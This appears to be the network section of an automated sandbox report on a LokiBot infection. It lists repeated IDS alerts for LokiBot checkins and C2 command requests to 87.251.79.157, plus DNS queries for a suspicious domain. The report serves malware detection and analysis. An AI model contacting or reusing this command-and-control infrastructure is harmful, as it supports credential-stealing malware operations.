                                              03/15/21-20:01:29.450562TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.587.251.79.157
                                              03/15/21-20:01:29.450562TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.587.251.79.157
                                              03/15/21-20:01:29.450562TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973380192.168.2.587.251.79.157
                                              03/15/21-20:01:29.706804TCP2025483ET TROJAN LokiBot Fake 404 Response804973387.251.79.157192.168.2.5
                                              03/15/21-20:01:29.958482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.587.251.79.157
                                              03/15/21-20:01:29.958482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.587.251.79.157
                                              03/15/21-20:01:29.958482TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.587.251.79.157
                                              03/15/21-20:01:29.958482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.587.251.79.157
                                              03/15/21-20:01:30.265339TCP2025483ET TROJAN LokiBot Fake 404 Response804973487.251.79.157192.168.2.5
                                              03/15/21-20:01:30.516411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.587.251.79.157
                                              03/15/21-20:01:30.516411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.587.251.79.157
                                              03/15/21-20:01:30.516411TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.587.251.79.157
                                              03/15/21-20:01:30.516411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.587.251.79.157
                                              03/15/21-20:01:30.769006TCP2025483ET TROJAN LokiBot Fake 404 Response804973587.251.79.157192.168.2.5
                                              03/15/21-20:01:31.008223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.587.251.79.157
                                              03/15/21-20:01:31.008223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.587.251.79.157
                                              03/15/21-20:01:31.008223TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.587.251.79.157
                                              03/15/21-20:01:31.008223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.587.251.79.157
                                              03/15/21-20:01:31.407385TCP2025483ET TROJAN LokiBot Fake 404 Response804973687.251.79.157192.168.2.5
                                              03/15/21-20:01:31.655733TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.587.251.79.157
                                              03/15/21-20:01:31.655733TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.587.251.79.157
                                              03/15/21-20:01:31.655733TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.587.251.79.157
                                              03/15/21-20:01:31.655733TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.587.251.79.157
                                              03/15/21-20:01:32.298559TCP2025483ET TROJAN LokiBot Fake 404 Response804973787.251.79.157192.168.2.5
                                              03/15/21-20:01:32.541887TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.587.251.79.157
                                              03/15/21-20:01:32.541887TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.587.251.79.157
                                              03/15/21-20:01:32.541887TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.587.251.79.157
                                              03/15/21-20:01:32.541887TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.587.251.79.157
                                              03/15/21-20:01:33.109786TCP2025483ET TROJAN LokiBot Fake 404 Response804973887.251.79.157192.168.2.5
                                              03/15/21-20:01:33.365221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.587.251.79.157
                                              03/15/21-20:01:33.365221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.587.251.79.157
                                              03/15/21-20:01:33.365221TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.587.251.79.157
                                              03/15/21-20:01:33.365221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.587.251.79.157
                                              03/15/21-20:01:33.615085TCP2025483ET TROJAN LokiBot Fake 404 Response804973987.251.79.157192.168.2.5
                                              03/15/21-20:01:33.848929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.587.251.79.157
                                              03/15/21-20:01:33.848929TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.587.251.79.157
                                              03/15/21-20:01:33.848929TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.587.251.79.157
                                              03/15/21-20:01:33.848929TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.587.251.79.157
                                              03/15/21-20:01:34.100251TCP2025483ET TROJAN LokiBot Fake 404 Response804974087.251.79.157192.168.2.5
                                              03/15/21-20:01:34.358578TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.587.251.79.157
                                              03/15/21-20:01:34.358578TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.587.251.79.157
                                              03/15/21-20:01:34.358578TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.587.251.79.157
                                              03/15/21-20:01:34.358578TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.587.251.79.157
                                              03/15/21-20:01:34.628393TCP2025483ET TROJAN LokiBot Fake 404 Response804974187.251.79.157192.168.2.5
                                              03/15/21-20:01:34.878601TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.587.251.79.157
                                              03/15/21-20:01:34.878601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.587.251.79.157
                                              03/15/21-20:01:34.878601TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.587.251.79.157
                                              03/15/21-20:01:34.878601TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.587.251.79.157
                                              03/15/21-20:01:35.166644TCP2025483ET TROJAN LokiBot Fake 404 Response804974287.251.79.157192.168.2.5
                                              03/15/21-20:01:35.414646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.587.251.79.157
                                              03/15/21-20:01:35.414646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.587.251.79.157
                                              03/15/21-20:01:35.414646TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.587.251.79.157
                                              03/15/21-20:01:35.414646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.587.251.79.157
                                              03/15/21-20:01:37.513857TCP2025483ET TROJAN LokiBot Fake 404 Response804974387.251.79.157192.168.2.5
                                              03/15/21-20:01:37.905678TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.587.251.79.157
                                              03/15/21-20:01:37.905678TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.587.251.79.157
                                              03/15/21-20:01:37.905678TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.587.251.79.157
                                              03/15/21-20:01:37.905678TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.587.251.79.157
                                              03/15/21-20:01:38.861871TCP2025483ET TROJAN LokiBot Fake 404 Response804974487.251.79.157192.168.2.5
                                              03/15/21-20:01:39.134248TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.587.251.79.157
                                              03/15/21-20:01:39.134248TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.587.251.79.157
                                              03/15/21-20:01:39.134248TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.587.251.79.157
                                              03/15/21-20:01:39.134248TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.587.251.79.157
                                              03/15/21-20:01:39.420018TCP2025483ET TROJAN LokiBot Fake 404 Response804974587.251.79.157192.168.2.5
                                              03/15/21-20:01:39.905942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.587.251.79.157
                                              03/15/21-20:01:39.905942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.587.251.79.157
                                              03/15/21-20:01:39.905942TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.587.251.79.157
                                              03/15/21-20:01:39.905942TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.587.251.79.157
                                              03/15/21-20:01:40.780756TCP2025483ET TROJAN LokiBot Fake 404 Response804974687.251.79.157192.168.2.5
                                              03/15/21-20:01:41.068304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.587.251.79.157
                                              03/15/21-20:01:41.068304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.587.251.79.157
                                              03/15/21-20:01:41.068304TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.587.251.79.157
                                              03/15/21-20:01:41.068304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.587.251.79.157
                                              03/15/21-20:01:41.614192TCP2025483ET TROJAN LokiBot Fake 404 Response804974787.251.79.157192.168.2.5
                                              03/15/21-20:01:41.839658TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.587.251.79.157
                                              03/15/21-20:01:41.839658TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.587.251.79.157
                                              03/15/21-20:01:41.839658TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.587.251.79.157
                                              03/15/21-20:01:41.839658TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.587.251.79.157
                                              03/15/21-20:01:42.790277TCP2025483ET TROJAN LokiBot Fake 404 Response804974887.251.79.157192.168.2.5
                                              03/15/21-20:01:43.049676TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.587.251.79.157
                                              03/15/21-20:01:43.049676TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.587.251.79.157
                                              03/15/21-20:01:43.049676TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.587.251.79.157
                                              03/15/21-20:01:43.049676TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.587.251.79.157
                                              03/15/21-20:01:43.664398TCP2025483ET TROJAN LokiBot Fake 404 Response804974987.251.79.157192.168.2.5
                                              03/15/21-20:01:43.914421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.587.251.79.157
                                              03/15/21-20:01:43.914421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.587.251.79.157
                                              03/15/21-20:01:43.914421TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.587.251.79.157
                                              03/15/21-20:01:43.914421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.587.251.79.157
                                              03/15/21-20:01:44.222182TCP2025483ET TROJAN LokiBot Fake 404 Response804975087.251.79.157192.168.2.5
                                              03/15/21-20:01:44.462000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.587.251.79.157
                                              03/15/21-20:01:44.462000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.587.251.79.157
                                              03/15/21-20:01:44.462000TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.587.251.79.157
                                              03/15/21-20:01:44.462000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.587.251.79.157
                                              03/15/21-20:01:44.709526TCP2025483ET TROJAN LokiBot Fake 404 Response804975187.251.79.157192.168.2.5
                                              03/15/21-20:01:44.936401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.587.251.79.157
                                              03/15/21-20:01:44.936401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.587.251.79.157
                                              03/15/21-20:01:44.936401TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.587.251.79.157
                                              03/15/21-20:01:44.936401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.587.251.79.157
                                              03/15/21-20:01:45.928818TCP2025483ET TROJAN LokiBot Fake 404 Response804975287.251.79.157192.168.2.5
                                              03/15/21-20:01:46.167455TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.587.251.79.157
                                              03/15/21-20:01:46.167455TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.587.251.79.157
                                              03/15/21-20:01:46.167455TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.587.251.79.157
                                              03/15/21-20:01:46.167455TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.587.251.79.157
                                              03/15/21-20:01:46.622527TCP2025483ET TROJAN LokiBot Fake 404 Response804975387.251.79.157192.168.2.5
                                              03/15/21-20:01:46.877666TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.587.251.79.157
                                              03/15/21-20:01:46.877666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.587.251.79.157
                                              03/15/21-20:01:46.877666TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.587.251.79.157
                                              03/15/21-20:01:46.877666TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.587.251.79.157
                                              03/15/21-20:01:47.542125TCP2025483ET TROJAN LokiBot Fake 404 Response804975487.251.79.157192.168.2.5
                                              03/15/21-20:01:47.791489TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.587.251.79.157
                                              03/15/21-20:01:47.791489TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.587.251.79.157
                                              03/15/21-20:01:47.791489TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.587.251.79.157
                                              03/15/21-20:01:47.791489TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.587.251.79.157
                                              03/15/21-20:01:48.513505TCP2025483ET TROJAN LokiBot Fake 404 Response804975587.251.79.157192.168.2.5
                                              03/15/21-20:01:48.767345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.587.251.79.157
                                              03/15/21-20:01:48.767345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.587.251.79.157
                                              03/15/21-20:01:48.767345TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.587.251.79.157
                                              03/15/21-20:01:48.767345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.587.251.79.157
                                              03/15/21-20:01:49.270062TCP2025483ET TROJAN LokiBot Fake 404 Response804975687.251.79.157192.168.2.5
                                              03/15/21-20:01:49.520613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.587.251.79.157
                                              03/15/21-20:01:49.520613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.587.251.79.157
                                              03/15/21-20:01:49.520613TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.587.251.79.157
                                              03/15/21-20:01:49.520613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.587.251.79.157
                                              03/15/21-20:01:49.785250TCP2025483ET TROJAN LokiBot Fake 404 Response804975787.251.79.157192.168.2.5
                                              03/15/21-20:01:50.051361TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.587.251.79.157
                                              03/15/21-20:01:50.051361TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.587.251.79.157
                                              03/15/21-20:01:50.051361TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.587.251.79.157
                                              03/15/21-20:01:50.051361TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.587.251.79.157
                                              03/15/21-20:01:50.317365TCP2025483ET TROJAN LokiBot Fake 404 Response804975887.251.79.157192.168.2.5
                                              03/15/21-20:01:50.560163TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.587.251.79.157
                                              03/15/21-20:01:50.560163TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.587.251.79.157
                                              03/15/21-20:01:50.560163TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.587.251.79.157
                                              03/15/21-20:01:50.560163TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.587.251.79.157
                                              03/15/21-20:01:50.805489TCP2025483ET TROJAN LokiBot Fake 404 Response804975987.251.79.157192.168.2.5
                                              03/15/21-20:01:51.055531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.587.251.79.157
                                              03/15/21-20:01:51.055531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.587.251.79.157
                                              03/15/21-20:01:51.055531TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.587.251.79.157
                                              03/15/21-20:01:51.055531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976080192.168.2.587.251.79.157
                                              03/15/21-20:01:51.371976TCP2025483ET TROJAN LokiBot Fake 404 Response804976087.251.79.157192.168.2.5
                                              03/15/21-20:01:51.624270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.587.251.79.157
                                              03/15/21-20:01:51.624270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.587.251.79.157
                                              03/15/21-20:01:51.624270TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.587.251.79.157
                                              03/15/21-20:01:51.624270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.587.251.79.157
                                              03/15/21-20:01:51.938138TCP2025483ET TROJAN LokiBot Fake 404 Response804976187.251.79.157192.168.2.5
                                              03/15/21-20:01:52.186493TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.587.251.79.157
                                              03/15/21-20:01:52.186493TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.587.251.79.157
                                              03/15/21-20:01:52.186493TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.587.251.79.157
                                              03/15/21-20:01:52.186493TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.587.251.79.157
                                              03/15/21-20:01:52.449353TCP2025483ET TROJAN LokiBot Fake 404 Response804976287.251.79.157192.168.2.5
                                              03/15/21-20:01:52.696929TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.587.251.79.157
                                              03/15/21-20:02:34.145989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.587.251.79.157
                                              03/15/21-20:02:34.145989TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.587.251.79.157
                                              03/15/21-20:02:34.145989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.2.587.251.79.157
                                              03/15/21-20:02:34.575041TCP2025483ET TROJAN LokiBot Fake 404 Response804981087.251.79.157192.168.2.5
                                              03/15/21-20:02:34.829000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.587.251.79.157
                                              03/15/21-20:02:34.829000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.587.251.79.157
                                              03/15/21-20:02:34.829000TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.587.251.79.157
                                              03/15/21-20:02:34.829000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.587.251.79.157
                                              03/15/21-20:02:35.190508TCP2025483ET TROJAN LokiBot Fake 404 Response804981187.251.79.157192.168.2.5
                                              03/15/21-20:02:35.434683TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.587.251.79.157
                                              03/15/21-20:02:35.434683TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.587.251.79.157
                                              03/15/21-20:02:35.434683TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.587.251.79.157
                                              03/15/21-20:02:35.434683TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.2.587.251.79.157
                                              03/15/21-20:02:35.715600TCP2025483ET TROJAN LokiBot Fake 404 Response804981287.251.79.157192.168.2.5
                                              03/15/21-20:02:35.964694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.587.251.79.157
                                              03/15/21-20:02:35.964694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.587.251.79.157
                                              03/15/21-20:02:35.964694TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.587.251.79.157
                                              03/15/21-20:02:35.964694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.2.587.251.79.157
                                              03/15/21-20:02:36.235228TCP2025483ET TROJAN LokiBot Fake 404 Response804981387.251.79.157192.168.2.5
                                              03/15/21-20:02:36.490300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.587.251.79.157
                                              03/15/21-20:02:36.490300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.587.251.79.157
                                              03/15/21-20:02:36.490300TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.587.251.79.157
                                              03/15/21-20:02:36.490300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.587.251.79.157
                                              03/15/21-20:02:36.724258TCP2025483ET TROJAN LokiBot Fake 404 Response804981487.251.79.157192.168.2.5
                                              03/15/21-20:02:36.967007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.587.251.79.157
                                              03/15/21-20:02:36.967007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.587.251.79.157
                                              03/15/21-20:02:36.967007TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.587.251.79.157
                                              03/15/21-20:02:36.967007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.2.587.251.79.157
                                              03/15/21-20:02:37.823558TCP2025483ET TROJAN LokiBot Fake 404 Response804981587.251.79.157192.168.2.5
                                              03/15/21-20:02:38.070057TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.587.251.79.157
                                              03/15/21-20:02:38.070057TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.587.251.79.157
                                              03/15/21-20:02:38.070057TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.587.251.79.157
                                              03/15/21-20:02:38.070057TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.2.587.251.79.157
                                              03/15/21-20:02:38.331742TCP2025483ET TROJAN LokiBot Fake 404 Response804981687.251.79.157192.168.2.5
                                              03/15/21-20:02:38.572152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.587.251.79.157
                                              03/15/21-20:02:38.572152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.587.251.79.157
                                              03/15/21-20:02:38.572152TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.587.251.79.157
                                              03/15/21-20:02:38.572152TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.587.251.79.157
                                              03/15/21-20:02:38.816870TCP2025483ET TROJAN LokiBot Fake 404 Response804981787.251.79.157192.168.2.5
                                              03/15/21-20:02:39.060147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.587.251.79.157
                                              03/15/21-20:02:39.060147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.587.251.79.157
                                              03/15/21-20:02:39.060147TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.587.251.79.157
                                              03/15/21-20:02:39.060147TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.587.251.79.157
                                              03/15/21-20:02:39.298110TCP2025483ET TROJAN LokiBot Fake 404 Response804981887.251.79.157192.168.2.5
                                              03/15/21-20:02:39.551285TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.587.251.79.157
                                              03/15/21-20:02:39.551285TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.587.251.79.157
                                              03/15/21-20:02:39.551285TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.587.251.79.157
                                              03/15/21-20:02:39.551285TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.587.251.79.157
                                              03/15/21-20:02:40.745247TCP2025483ET TROJAN LokiBot Fake 404 Response804981987.251.79.157192.168.2.5
                                              03/15/21-20:02:40.980813TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.587.251.79.157
                                              03/15/21-20:02:40.980813TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.587.251.79.157
                                              03/15/21-20:02:40.980813TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.587.251.79.157
                                              03/15/21-20:02:40.980813TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.587.251.79.157
                                              03/15/21-20:02:42.875461TCP2025483ET TROJAN LokiBot Fake 404 Response804982087.251.79.157192.168.2.5
                                              03/15/21-20:02:43.130286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.587.251.79.157
                                              03/15/21-20:02:43.130286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.587.251.79.157
                                              03/15/21-20:02:43.130286TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.587.251.79.157
                                              03/15/21-20:02:43.130286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.587.251.79.157
                                              03/15/21-20:02:45.156696TCP2025483ET TROJAN LokiBot Fake 404 Response804982187.251.79.157192.168.2.5
                                              03/15/21-20:02:45.404134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.587.251.79.157
                                              03/15/21-20:02:45.404134TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.587.251.79.157
                                              03/15/21-20:02:45.404134TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.587.251.79.157
                                              03/15/21-20:02:45.404134TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.587.251.79.157
                                              03/15/21-20:02:50.932725TCP2025483ET TROJAN LokiBot Fake 404 Response804982287.251.79.157192.168.2.5
                                              03/15/21-20:02:51.159157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.587.251.79.157
                                              03/15/21-20:02:51.159157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.587.251.79.157
                                              03/15/21-20:02:51.159157TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.587.251.79.157
                                              03/15/21-20:02:51.159157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.587.251.79.157
                                              03/15/21-20:02:51.427690TCP2025483ET TROJAN LokiBot Fake 404 Response804982387.251.79.157192.168.2.5
                                              03/15/21-20:02:51.665948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.587.251.79.157
                                              03/15/21-20:02:51.665948TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.587.251.79.157
                                              03/15/21-20:02:51.665948TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.587.251.79.157
                                              03/15/21-20:02:51.665948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.2.587.251.79.157
                                              03/15/21-20:02:51.919107TCP2025483ET TROJAN LokiBot Fake 404 Response804982487.251.79.157192.168.2.5
                                              03/15/21-20:02:52.168227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.587.251.79.157
                                              03/15/21-20:02:52.168227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.587.251.79.157
                                              03/15/21-20:02:52.168227TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.587.251.79.157
                                              03/15/21-20:02:52.168227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.587.251.79.157
                                              03/15/21-20:02:52.854739TCP2025483ET TROJAN LokiBot Fake 404 Response804982587.251.79.157192.168.2.5
                                              03/15/21-20:02:53.077609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.587.251.79.157
                                              03/15/21-20:02:53.077609TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.587.251.79.157
                                              03/15/21-20:02:53.077609TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.587.251.79.157
                                              03/15/21-20:02:53.077609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.587.251.79.157
                                              03/15/21-20:02:53.321754TCP2025483ET TROJAN LokiBot Fake 404 Response804982687.251.79.157192.168.2.5

                                              TCP Packets

                                              UDP Packets

                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Mar 15, 2021 20:00:48.640778065 CET | 192.168.2.5 | 8.8.8.8 | 0x2b53 | Standard query (0) | liverpooldabestteamoftheworld.com | A (IP address) | IN (0x0001)
                                              Mar 15, 2021 20:00:48.898298979 CET | 192.168.2.5 | 8.8.8.8 | 0xbfbe | Standard query (0) | liverpooldabestteamoftheworld.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
